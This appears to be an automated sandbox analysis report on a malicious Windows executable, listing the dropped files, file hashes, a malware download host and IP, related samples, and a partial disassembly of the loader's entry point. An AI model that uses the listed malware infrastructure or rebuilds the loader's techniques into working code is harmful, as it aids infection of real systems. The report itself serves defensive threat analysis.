      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:Lisect_AVT_24003_G1A_70.exe
      Detection:MAL
      Classification:mal100.spre.troj.evad.winEXE@7/15@8/1
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 13
      • Number of non-executed functions: 14
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 20.42.65.92
      • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenFile calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      TimeTypeDescription
      00:31:42API Interceptor1x Sleep call for process: WerFault.exe modified
      22:58:42API Interceptor2x Sleep call for process: Lisect_AVT_24003_G1A_70.exe modified
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      44.221.84.105Lisect_AVT_24003_G1A_5.exeGet hashmaliciousQuasar, BdaejecBrowse
      • ddos.dnsnb8.net:799/cj//k1.rar
      Lisect_AVT_24003_G1A_16.exeGet hashmaliciousBdaejecBrowse
      • ddos.dnsnb8.net:799/cj//k2.rar
      LisectAVT_2403002C_193.exeGet hashmaliciousBdaejec, MetasploitBrowse
      • ddos.dnsnb8.net:799/cj//k3.rar
      LisectAVT_2403002C_196.exeGet hashmaliciousBdaejecBrowse
      • ddos.dnsnb8.net:799/cj//k1.rar
      LisectAVT_2403002B_91.exeGet hashmaliciousBdaejec, DBatLoaderBrowse
      • ddos.dnsnb8.net:799/cj//k2.rar
      LisectAVT_2403002B_492.exeGet hashmaliciousBdaejec, LokibotBrowse
      • ddos.dnsnb8.net:799/cj//k5.rar
      LisectAVT_2403002B_97.exeGet hashmaliciousBdaejecBrowse
      • ddos.dnsnb8.net:799/cj//k2.rar
      LisectAVT_2403002B_28.exeGet hashmaliciousBdaejecBrowse
      • ddos.dnsnb8.net:799/cj//k1.rar
      LisectAVT_2403002B_351.exeGet hashmaliciousAmadey, BdaejecBrowse
      • ddos.dnsnb8.net:799/cj//k5.rar
      LisectAVT_2403002B_28.exeGet hashmaliciousBdaejecBrowse
      • ddos.dnsnb8.net:799/cj//k1.rar
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      ddos.dnsnb8.netLisect_AVT_24003_G1A_5.exeGet hashmaliciousQuasar, BdaejecBrowse
      • 44.221.84.105
      Lisect_AVT_24003_G1A_16.exeGet hashmaliciousBdaejecBrowse
      • 44.221.84.105
      LisectAVT_2403002C_193.exeGet hashmaliciousBdaejec, MetasploitBrowse
      • 44.221.84.105
      LisectAVT_2403002C_196.exeGet hashmaliciousBdaejecBrowse
      • 44.221.84.105
      LisectAVT_2403002B_91.exeGet hashmaliciousBdaejec, DBatLoaderBrowse
      • 44.221.84.105
      LisectAVT_2403002B_492.exeGet hashmaliciousBdaejec, LokibotBrowse
      • 44.221.84.105
      LisectAVT_2403002B_97.exeGet hashmaliciousBdaejecBrowse
      • 44.221.84.105
      LisectAVT_2403002B_28.exeGet hashmaliciousBdaejecBrowse
      • 44.221.84.105
      LisectAVT_2403002B_351.exeGet hashmaliciousAmadey, BdaejecBrowse
      • 44.221.84.105
      LisectAVT_2403002B_28.exeGet hashmaliciousBdaejecBrowse
      • 44.221.84.105
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      AMAZON-AESUSLisect_AVT_24003_G1A_5.exeGet hashmaliciousQuasar, BdaejecBrowse
      • 44.221.84.105
      Lisect_AVT_24003_G1A_16.exeGet hashmaliciousBdaejecBrowse
      • 44.221.84.105
      LisectAVT_2403002C_193.exeGet hashmaliciousBdaejec, MetasploitBrowse
      • 44.221.84.105
      LisectAVT_2403002C_196.exeGet hashmaliciousBdaejecBrowse
      • 44.221.84.105
      LisectAVT_2403002B_91.exeGet hashmaliciousBdaejec, DBatLoaderBrowse
      • 44.221.84.105
      LisectAVT_2403002B_492.exeGet hashmaliciousBdaejec, LokibotBrowse
      • 44.221.84.105
      LisectAVT_2403002B_97.exeGet hashmaliciousBdaejecBrowse
      • 44.221.84.105
      LisectAVT_2403002B_28.exeGet hashmaliciousBdaejecBrowse
      • 44.221.84.105
      LisectAVT_2403002B_351.exeGet hashmaliciousAmadey, BdaejecBrowse
      • 44.221.84.105
      LisectAVT_2403002B_28.exeGet hashmaliciousBdaejecBrowse
      • 44.221.84.105
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeLisect_AVT_24003_G1A_5.exeGet hashmaliciousQuasar, BdaejecBrowse
        Lisect_AVT_24003_G1A_16.exeGet hashmaliciousBdaejecBrowse
          LisectAVT_2403002C_193.exeGet hashmaliciousBdaejec, MetasploitBrowse
            LisectAVT_2403002C_196.exeGet hashmaliciousBdaejecBrowse
              LisectAVT_2403002B_91.exeGet hashmaliciousBdaejec, DBatLoaderBrowse
                LisectAVT_2403002B_492.exeGet hashmaliciousBdaejec, LokibotBrowse
                  LisectAVT_2403002B_97.exeGet hashmaliciousBdaejecBrowse
                    LisectAVT_2403002B_28.exeGet hashmaliciousBdaejecBrowse
                      LisectAVT_2403002B_351.exeGet hashmaliciousAmadey, BdaejecBrowse
                        LisectAVT_2403002B_28.exeGet hashmaliciousBdaejecBrowse
                          Process:C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19456
                          Entropy (8bit):6.590765981131731
                          Encrypted:false
                          SSDEEP:384:1FVSfXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:ohQGPL4vzZq2o9W7GsxBbPr
                          MD5:B85963C74F24B6F80499C34A9F86CB27
                          SHA1:A064AA8D0114230F242ACFE1E8363077D5190AFB
                          SHA-256:48F1954A86E1E20E15587A66714D4A33F22BF0C31BC00BD88DFDDE84035AA219
                          SHA-512:4331169DAF087BF94650C0B5D8D25B1DC6170764554A705A8AC31871CA46F897E4888C789DA9AA0760E7266458DDF25F3C6EA0BD0FCF6D806FE4CEC115FD4831
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Reputation:low
                          Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                          Process:C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):2389504
                          Entropy (8bit):6.731341993187748
                          Encrypted:false
                          SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                          MD5:5E62A3147ACBFC14C7E12BCAA3D31D62
                          SHA1:314DCD04C577860FAEF0E48C015130D074EB2807
                          SHA-256:D6525DAC2B921288A05BFF98D160029A02CA611B45817BCF818FEDA2DD6F69F5
                          SHA-512:B2739554C7FA6A35F29CE1508C455B1E1ED580662DFBACB677315A752774E43FA475D6E310BCE8412CF8BAE928903B89FCA1D1961E6B5E24FBFC14ECB3D27D43
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):31744
                          Entropy (8bit):6.366688439142743
                          Encrypted:false
                          SSDEEP:768:uWQ3655Kv1X/qY1MSdGpQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdG+GCq2iW7z
                          MD5:BC412990B626784B049181F135F83235
                          SHA1:A388F33D7BC00895403FD1FF73CB181DCDC5B7BA
                          SHA-256:EE7053E684610C1194EA663912E180EA2735B33B1672AFFBD6A1EF4D166E2729
                          SHA-512:55C683A5F7C68E27A3CB7404C3421EF393658A22C9B61A0B20B055B1878C9278B8FEA0B3276BDFD0110831DCF62AF74BEC971ED9C9C1FD5FEF94619D19A5B8CB
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.9925602536798901
                          Encrypted:false
                          SSDEEP:192:InM6bD6a0XEeJgV0jE/J9zuiF6Z24IO8dgpD:ILD6hXEe/jQzuiF6Y4IO8C9
                          MD5:15AF380FA0F11415B564A29052AE626C
                          SHA1:AB2DA9DC4A6C0D8B3EC655B341369C55F36A66D3
                          SHA-256:C7EFDA14DBB82409409279B4CDCFC94E326FDE297DFEC840319DB06D42B505CB
                          SHA-512:1769C73A9DD2E1CEC2F321AE8674E8FF0FE6539D51880CD38BE3BC2D5746CECFA2D0995A2519DC28185429AFC56CB6F7CCA2FF9A2DDE8D35DC156BE588BE5443
                          Malicious:false
                          Reputation:low
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.4.9.9.2.7.4.6.5.7.1.3.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.4.9.9.2.8.1.8.4.4.6.5.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.8.f.3.e.0.1.d.-.e.9.a.d.-.4.1.e.1.-.b.6.1.a.-.5.f.3.1.1.b.0.e.d.9.9.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.b.3.6.9.3.f.2.-.b.2.e.e.-.4.4.9.d.-.9.2.2.7.-.9.4.d.9.1.4.0.0.a.1.c.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.o.H.O.v.Z.L.B.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.6.0.-.0.0.0.1.-.0.0.1.4.-.1.8.2.0.-.0.e.8.c.3.e.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.a.2.a.a.a.f.5.7.6.4.b.e.0.a.1.8.7.2.1.7.7.d.7.d.d.9.8.3.9.4.1.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.o.H.O.v.Z.L.B.f...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Thu Jul 25 02:58:47 2024, 0x1205a4 type
                          Category:dropped
                          Size (bytes):155176
                          Entropy (8bit):1.863192673643621
                          Encrypted:false
                          SSDEEP:384:nGmM+Ipfj0oox9ggdmAKV9t7CnO8dmNmttq0aVtrESlSLDo6Xa//lwpGw0:nc+Ixnox9zOVf7CnO8HaPDyokaXS4
                          MD5:35B8AE6CCA3CA83F5F42DD099F198C7B
                          SHA1:2DE2FBAF9F777420AACB55382D0EA657AF09E4FD
                          SHA-256:6C24F793FEEEE9B8C80EBAC18193FD5BDE8CF14BA62F05A2C58F8895BB322AEB
                          SHA-512:B5937821FFCB8F562515E2BC32F469719DFFF5962A06C56ECC96FB561E318E172BF83A2B895B88E1F34649B295FB7C102F02E0FE51188BC405DE7E8625C35172
                          Malicious:false
                          Reputation:low
                          Preview:MDMP..a..... .......g..f............D...............X.......l.... ......4...XO..........`.......8...........T...........@>..............h!..........T#..............................................................................eJ.......#......GenuineIntel............T.......`...]..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):6280
                          Entropy (8bit):3.7259515648223895
                          Encrypted:false
                          SSDEEP:96:RSIU6o7wVetbthA632iYmR+u6Ah/5aMQU089bySqsfEgVRmm:R6l7wVeJt2632iYmEepD089byJsfEymm
                          MD5:B27286997CC0D916CC9C2B9A9340CF69
                          SHA1:E6D74846C635849E8F78DF7BF9ED7F83AD51FE6A
                          SHA-256:C1C585E6C55CD8B357E048B90C10D6BD01A7C49E5A4565087C0335DC236036AC
                          SHA-512:245DF542973D8DA65B1DD4B6AE56E8014FCF9259136406780A45986FEB4FC654D603A61EF45956425627BF5AA759D1D14A13B8D1CE61B86B6A64B01CD3E4B2E2
                          Malicious:false
                          Reputation:low
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.2.0.<./.P.i.
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4565
                          Entropy (8bit):4.46325422739156
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zsErJg77aI9MnWpW8VYmYm8M4J+bt7lFwP1r+q8/Fexi0gm0xd:uIjfwI7+W7VOJz3Tg/xd
                          MD5:35082CFB6F6BBE8C637510D79284B2A3
                          SHA1:BDC50AE1001E1489BAD60709B5BC4310763A9A49
                          SHA-256:C2C84A8AC83FC93A890A34BE744F482676A47BC14B62F4FC5A47A9C9AEF7FFC2
                          SHA-512:FE88EAB3EF97B138D627856C319322CE6ACF8FDB446EDA0406D3F8FC126C75DCA208726A17862B8F320A13886AF77B00C68874BDFAC173F539013FB3A2C72CDA
                          Malicious:false
                          Reputation:low
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425881" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                          Process:C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):4
                          Entropy (8bit):1.5
                          Encrypted:false
                          SSDEEP:3:Nv:9
                          MD5:D3B07384D113EDEC49EAA6238AD5FF00
                          SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                          SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                          SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:foo.
                          Process:C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):4
                          Entropy (8bit):1.5
                          Encrypted:false
                          SSDEEP:3:Nv:9
                          MD5:D3B07384D113EDEC49EAA6238AD5FF00
                          SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                          SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                          SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:foo.
                          Process:C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):4
                          Entropy (8bit):1.5
                          Encrypted:false
                          SSDEEP:3:Nv:9
                          MD5:D3B07384D113EDEC49EAA6238AD5FF00
                          SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                          SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                          SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                          Malicious:false
                          Preview:foo.
                          Process:C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):4
                          Entropy (8bit):1.5
                          Encrypted:false
                          SSDEEP:3:Nv:9
                          MD5:D3B07384D113EDEC49EAA6238AD5FF00
                          SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                          SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                          SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                          Malicious:false
                          Preview:foo.
                          Process:C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):4
                          Entropy (8bit):1.5
                          Encrypted:false
                          SSDEEP:3:Nv:9
                          MD5:D3B07384D113EDEC49EAA6238AD5FF00
                          SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                          SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                          SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                          Malicious:false
                          Preview:foo.
                          Process:C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
                          File Type:ASCII text
                          Category:modified
                          Size (bytes):4
                          Entropy (8bit):1.5
                          Encrypted:false
                          SSDEEP:3:Nv:9
                          MD5:D3B07384D113EDEC49EAA6238AD5FF00
                          SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                          SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                          SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                          Malicious:false
                          Preview:foo.
                          Process:C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:modified
                          Size (bytes):15872
                          Entropy (8bit):7.031075575407894
                          Encrypted:false
                          SSDEEP:384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
                          MD5:F7D21DE5C4E81341ECCD280C11DDCC9A
                          SHA1:D4E9EF10D7685D491583C6FA93AE5D9105D815BD
                          SHA-256:4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
                          SHA-512:E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 92%
                          Joe Sandbox View:
                          • Filename: Lisect_AVT_24003_G1A_5.exe, Detection: malicious, Browse
                          • Filename: Lisect_AVT_24003_G1A_16.exe, Detection: malicious, Browse
                          • Filename: LisectAVT_2403002C_193.exe, Detection: malicious, Browse
                          • Filename: LisectAVT_2403002C_196.exe, Detection: malicious, Browse
                          • Filename: LisectAVT_2403002B_91.exe, Detection: malicious, Browse
                          • Filename: LisectAVT_2403002B_492.exe, Detection: malicious, Browse
                          • Filename: LisectAVT_2403002B_97.exe, Detection: malicious, Browse
                          • Filename: LisectAVT_2403002B_28.exe, Detection: malicious, Browse
                          • Filename: LisectAVT_2403002B_351.exe, Detection: malicious, Browse
                          • Filename: LisectAVT_2403002B_28.exe, Detection: malicious, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
                          File Type:MS Windows registry file, NT/2000 or above
                          Category:dropped
                          Size (bytes):1835008
                          Entropy (8bit):4.417103896721939
                          Encrypted:false
                          SSDEEP:6144:ncifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuN05+:ci58oSWIZBk2MM6AFBSo
                          MD5:C376AED44A7A2A7CBEFA427DE52C886E
                          SHA1:A2E7E1E8B2F5621F440F66E729B9A6D3EF40641E
                          SHA-256:97A9227DD902FB274FB023542852CDD30401DC2737D86947D0C8420716DE4EB9
                          SHA-512:D5BB8CE1A5CBFE677A5FC876F58E14DFB9CFA51A5286A6E228D55082A21F92885368DB87934C756C489E1C41365FA47EB398F38BC9BB2896D7C810A544536DD8
                          Malicious:false
                          Preview:regfF...F....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.821341396665212
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:Lisect_AVT_24003_G1A_70.exe
                          File size:6'279'680 bytes
                          MD5:641443f984c1754a4d606b248b334577
                          SHA1:b618cd68aeb6ac78600f312c70ee484d6931559c
                          SHA256:def706463545d7e16aa4a10449854f28bd979780cd227affd5c0c2ad52ae8026
                          SHA512:4d08b9d4aa9269446d8f7efcb7182b662745754dad0e9a89b184bc9b6a1bcfda416e3944618134f11b0f052619f98d89f52a5ae675b6c99c77dd697d6d778a1a
                          SSDEEP:98304:tLYyArRU+pKIYF3Wsh3zaVzMI5VAIU4hss+EaNJ5vuaPEWCNSbTwbCH:tJArvpK5eVIAu4EtvLEWnbTwe
                          TLSH:8C5633D33704D4D5C0A58AB2095ED1E602693E3EA9B5407ABA1F7BCDC7310DCAF98B64
                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......e.............................`............@.......................................@.................................F.3.l..
                          Icon Hash:1d9e677775470e9d
                          Entrypoint:0x1416000
                          Entrypoint Section:;Mu
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x65CB930E [Tue Feb 13 16:04:30 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:0
                          File Version Major:6
                          File Version Minor:0
                          Subsystem Version Major:6
                          Subsystem Version Minor:0
                          Import Hash:49b6343a7e296cc33dfa349b97649cac
                          Instruction
                          push ebp
                          mov ebp, esp
                          sub esp, 0000016Ch
                          xor eax, eax
                          push ebx
                          push esi
                          push edi
                          mov dword ptr [ebp-24h], eax
                          mov dword ptr [ebp-10h], eax
                          mov dword ptr [ebp-14h], eax
                          mov dword ptr [ebp-08h], eax
                          mov dword ptr [ebp-0Ch], eax
                          mov dword ptr [ebp-20h], eax
                          mov dword ptr [ebp-18h], eax
                          mov dword ptr [ebp-48h], 764F486Fh
                          mov dword ptr [ebp-44h], 66424C5Ah
                          mov dword ptr [ebp-40h], 6578652Eh
                          mov dword ptr [ebp-3Ch], 00000000h
                          call 00007FCF287584A5h
                          pop eax
                          add eax, 00000225h
                          mov dword ptr [ebp-04h], eax
                          mov eax, dword ptr fs:[00000030h]
                          mov dword ptr [ebp-28h], eax
                          mov eax, dword ptr [ebp-04h]
                          mov dword ptr [eax], E904C483h
                          mov eax, dword ptr [ebp-04h]
                          mov dword ptr [eax+04h], FFB2C67Fh
                          mov eax, dword ptr [ebp-28h]
                          mov eax, dword ptr [eax+0Ch]
                          mov eax, dword ptr [eax+1Ch]
                          mov eax, dword ptr [eax]
                          mov eax, dword ptr [eax+08h]
                          mov ecx, dword ptr [eax+3Ch]
                          mov ecx, dword ptr [ecx+eax+78h]
                          add ecx, eax
                          mov edi, dword ptr [ecx+1Ch]
                          mov ebx, dword ptr [ecx+20h]
                          mov esi, dword ptr [ecx+24h]
                          mov ecx, dword ptr [ecx+18h]
                          add esi, eax
                          add edi, eax
                          add ebx, eax
                          xor edx, edx
